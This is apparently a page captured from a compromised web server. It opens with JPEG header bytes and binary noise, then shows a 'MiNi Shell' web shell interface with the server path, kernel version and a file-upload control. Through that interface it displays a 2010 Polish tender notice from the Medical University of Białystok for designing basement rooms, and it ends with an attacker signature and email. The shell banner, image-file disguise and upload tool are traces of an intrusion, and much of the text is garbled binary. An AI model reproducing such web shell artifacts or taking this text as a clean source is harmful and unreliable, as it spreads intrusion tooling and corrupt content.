JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100401/72483-N-2010.html

<p class="kh_header"><b>Białystok: Zaprojektowanie dodatkowych pomieszczeń piwnic 
o powierzchni ok. 150  m2  w realizowanym budynku Euroregionalnego
Centrum Farmacji Uniwersytetu Medycznego w Białymstoku przy
ul. Mickiewicza 2C, wraz  z pełnieniem nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 72483 - 2010; data zamieszczenia: 01.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Białymstoku , ul. Jana Kilińskiego 1, 15-089 Białystok, woj. podlaskie, tel. 085 7485400, faks 085 7485627.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umwb.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie dodatkowych pomieszczeń piwnic 
o powierzchni ok. 150  m2  w realizowanym budynku Euroregionalnego
Centrum Farmacji Uniwersytetu Medycznego w Białymstoku przy
ul. Mickiewicza 2C, wraz  z pełnieniem nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zaprojektowanie dodatkowych pomieszczeń piwnic 
o powierzchni ok. 150  m2  w realizowanym budynku Euroregionalnego
Centrum Farmacji Uniwersytetu Medycznego w Białymstoku przy
ul. Mickiewicza 2C, wraz  z pełnieniem nadzoru autorskiego
Wykonawca ma obowiązek wykonania zamówienia  z zachowaniem  standardów wykończenia pomieszczeń jak w przekazanej dokumentacji oraz zachowaniem wymogów  obowiązujących dla pomieszczeń w których  będzie odbywała się praca ze źródłami promieniowania jonizującego. Wykonawca zobowiązany jest do takiego opracowania projektów aby nowe 
rozwiązania projektowe  były  kompatybilne z   rozwiązaniami projektowymi zawartymi przekazanej dokumentacji projektowej. W przypadku, gdyby zaszła konieczność ingerencji w opracowania branżowe, konstrukcyjne i architektoniczne wyższych kondygnacji, oferent zobowiązany  będzie wykonać je w ramach niniejszego zamówienia. 	
   W proponowanych  rozwiązaniach projektowych Wykonawca powinien uwzględnić założenia Programu Funkcjonalno-Użytkowego  oraz decyzji wskazanych w SIWZ
Do obowiązków Wykonawcy/projektanta w zakresie realizacji przedmiotu zamówienia 
należy również: 
a) uzyskanie wymaganych opinii, uzgodnień i sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów ( jeśli zajdzie konieczna potrzeba należy uzyskać/uaktualnić warunki techniczne) podłączenia i dostawy energii elektrycznej, gazu ,wod-kan. deszczówki i c.o.
          b) uzyskanie akceptacji Zamawiającego, projektu budowlanego przed złożeniem do pozwolenia na budowę, uzgodnienie z Zamawiającym projektu aranżacji wnętrz architektonicznych wraz z kolorystyką. 
c) sprawowanie nadzoru autorskiego na żądanie Zamawiającego lub właściwego organu w zakresie:
    - stwierdzania w toku wykonywania robót  budowlanych zgodności realizacji z projektem,
                 - uzgadnianie możliwości wprowadzenia rozwiązań zamiennych w stosunku do 
przewidzianych w projekcie, zgłoszonych przez kierownika budowy, inspektora nadzoru 
inwestorskiego, po uzyskaniu akceptacji Zamawiającego,
   - wyjaśnianie wątpliwości dotyczących projektu i zawartych w nich rozwiązań,
             - sprawowanie nadzoru autorskiego w czasie realizacji robót budowlanych i udział 
                w spotkaniach na budowie poszczególnych projektantów branżowych, 
d) uzyskanie  zamiennego pozwolenia na budowę całej inwestycji, 
e) wskazanie w dokumentacji projektowej wszystkich styków  projektowanych robót, z  robotami 
   wykonywanymi przez obecnego wykonawcę. (GW),  (wskazać wszystkie miejsca włączenia 
   instalacji w instalacje wykonywane przez GW, wszystkie miejsca przejść przez elementy 
   przegród budowlanych, wykonywanych przez GW, opisać sposób wykonania tych 
   włączeń),
f) uwzględnienie w zakresie prac projektowych stanu robót wykonanych przez GW 
   i zaprojektowanie przejścia instalacji przez elementy konstrukcyjne  budynku. 
        4) Zamawiający dopuszcza, w wyjątkowych przypadkach wskazanie w dokumentacji na znak towarowy, patent lub  pochodzenie z uzasadnionych względów technologicznych, ekonomicznych lub organizacyjnych. W takim przypadku przy wskazaniu powinien być dopisek: dopuszcza się   rozwiązania równoważne. 
        5) Dokumentacja projektowa musi być opracowana w sposób zgodny z ustaleniami  określonymi: 
a) obowiązującymi przepisami ustawy z dnia 07 lipca 1994 r.-Prawo Budowlane (tj.Dz.U. z 2006 r.,  Nr 156, poz.1118 ze zmianami),
b) wymaganiami Ustawy Pzp,
c) Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r w sprawie   szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej  wykonania i  odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202,poz 2072 z dnia 16.09.2009r) 
d) Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z dnia 8 czerwca 2004r. Nr 130, poz. 1389)
e)rozporządzeniami oraz wytycznymi branżowymi, 
f) zasadami wiedzy technicznej, w szczególności dotyczącymi zachowania    najwyższych standardów  energooszczędności,
g)obowiązującymi Polskimi Normami,
h) innymi szczególnymi ustaleniami określonymi przez Zamawiającego. 
6) Dokumentacja techniczna winna być wykonana w stanie kompletnym z  punktu 
   widzenia celu, któremu ma służyć.
7)  Na przedmiot zamówienia Wykonawca udzieli co najmniej 36 miesięcznej gwarancji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.23.48.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenia spełniania tego warunku Wykonawca załączy aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
Ocena spełnienia warunku wymaganyego od Wykonawców zostanie dokonana wg formuły:  spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenia spełniania tego warunku Wykonawca przedstawi wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia tj. dwóch zamówień podobnych tzn. dotyczących wykonania dokumentacji projektowych wraz uzyskaniem pozwolenia na budowę obiektu użyteczności publicznej, w tym co najmniej jednej dokumentacji projektowej obejmującej laboratorium chemiczne o powierzchni minimum 120 m2 - w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz załączeniem dokumentów potwierdzających, że usługi zostały lub są wykonywane należycie; 
Ocena spełnienia warunku wymaganyego od Wykonawców zostanie dokonana wg formuły:  spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty pozostałe:
5. 1.  wypełniony formularz ofertowy  - wg załącznika  nr  1 do SIWZ;
          5.2. oświadczenie o odbyciu wizji lokalnej - wg załącznika nr 6 do SIWZ;
             5.3. wykaz części zamówienia, których wykonanie Wykonawca zamierza 
                powierzyć podwykonawcom (jeżeli są przewidywani) - wg załącznika nr 4 do SIWZ;
5.4. oświadczenie o przyjęciu wspólnej odpowiedzialności solidarnej za niewykonanie lub nienależyte wykonanie umowy; w  przypadku Wykonawców występujących wspólnie  ( konsorcjum, s. c. ) - na formularzu ofertowym;
            5.5. oświadczenie uczestnika postępowania, o przysługiwaniu mu autorskich praw majątkowych w zakresie określonym w warunkach postępowania  - wg załącznik nr 7 do SIWZ;
      5.6. oświadczenie uczestnika postępowania  o nieodpłatnym przekazaniu praw autorskich 
             na  rzecz Zamawiającego - wg załącznika nr 8 do SIWZ; 
           5.7. w  przypadku Wykonawców występujących wspólnie (konsorcjum, s. c.), Wykonawcy  składają oświadczenie o przyjęciu wspólnej odpowiedzialności solidarnej za niewykonanie lub nienależyte wykonanie umowy; 
           5.8. oświadczenia małżonka Wykonawcy - wg  załącznika nr  10 do  SIWZ  - zgodnie z zapisem 
        w uwadze poniżej: 
Uwaga: W związku z przepisem art. 787 kodeksu postępowania cywilnego, Wykonawcy występujący w obrocie jako indywidualny podmiot gospodarczy, wspólnicy spółki cywilnej, wspólnicy spółki jawnej, pozostający w związku małżeńskim na zasadzie ustawowej wspólności majątkowej, zobowiązani są do złożenia oświadczeń współmałżonków, których treść stanowi załącznik nr 10 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają i formy pisemnej pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2.	Zmiana umowy możliwa jest w sytuacji, gdy:
1)	jest korzystna dla Zamawiającego,
2)	konieczność zmiany wynika z okoliczności, których nie dało się przewidzieć w dacie zawarcia umowy, 
3)	zmieniły się przepisy, których regulacje wpływają na prawa i obowiązki stron, 
4)	istnieje konieczność przesunięcia terminu wykonania poszczególnych etapów bądź terminu wykonania umowy z przyczyn leżących po stronie Zamawiającego,
5)	zachodzą inne, określone wyżej w umowie okoliczności.
3.	Ustalone umową terminy mogą ulec wydłużeniu o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy w następujących przypadkach:
1)	wystąpienia konieczności wykonania dodatkowych i niemożliwych do przewidzenia prac, których zrealizowanie jest niezbędne, z uwagi na zmianę obowiązujących przepisów, a których  przeprowadzenie  wiąże się z potrzebą zmiany terminu,
2)	jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych lub dających się przypisać Zamawiającemu,
3)	siły wyższej,
4)	na skutek działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
5)	wystąpienie innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny. 
4.	O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów, Wykonawca winien jest poinformować Zamawiającego  pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umwb.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Medyczny w Białymstoku, 15-222 Białystok, ul. A. Mickiewicza 2 c, Sekcja ds. zamówień publicznych, pok. 12A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2010 godzina 10:00, miejsce: Uniwersytet Medyczny w Białymstoku, 15-089 Białystok, ul. Jana Kilińskiego 1, Kancelaria Ogólna UMB (lewe skrzydło Pałacu Branickich).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane z Programu Operacyjnego: Rozwój Polski Wschodniej 2007-2013 Oś priorytetowa I, Działanie 1.1. Nowoczesna Gospodarka. Projekt: Nr POPW 1.1- 21 p.n.: Utworzenie nowoczesnej bazy dydaktyczno - naukowej dla potrzeb Euroregionalnego Centrum Farmacji Uniwersytetu Medycznego w  Białymstoku..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com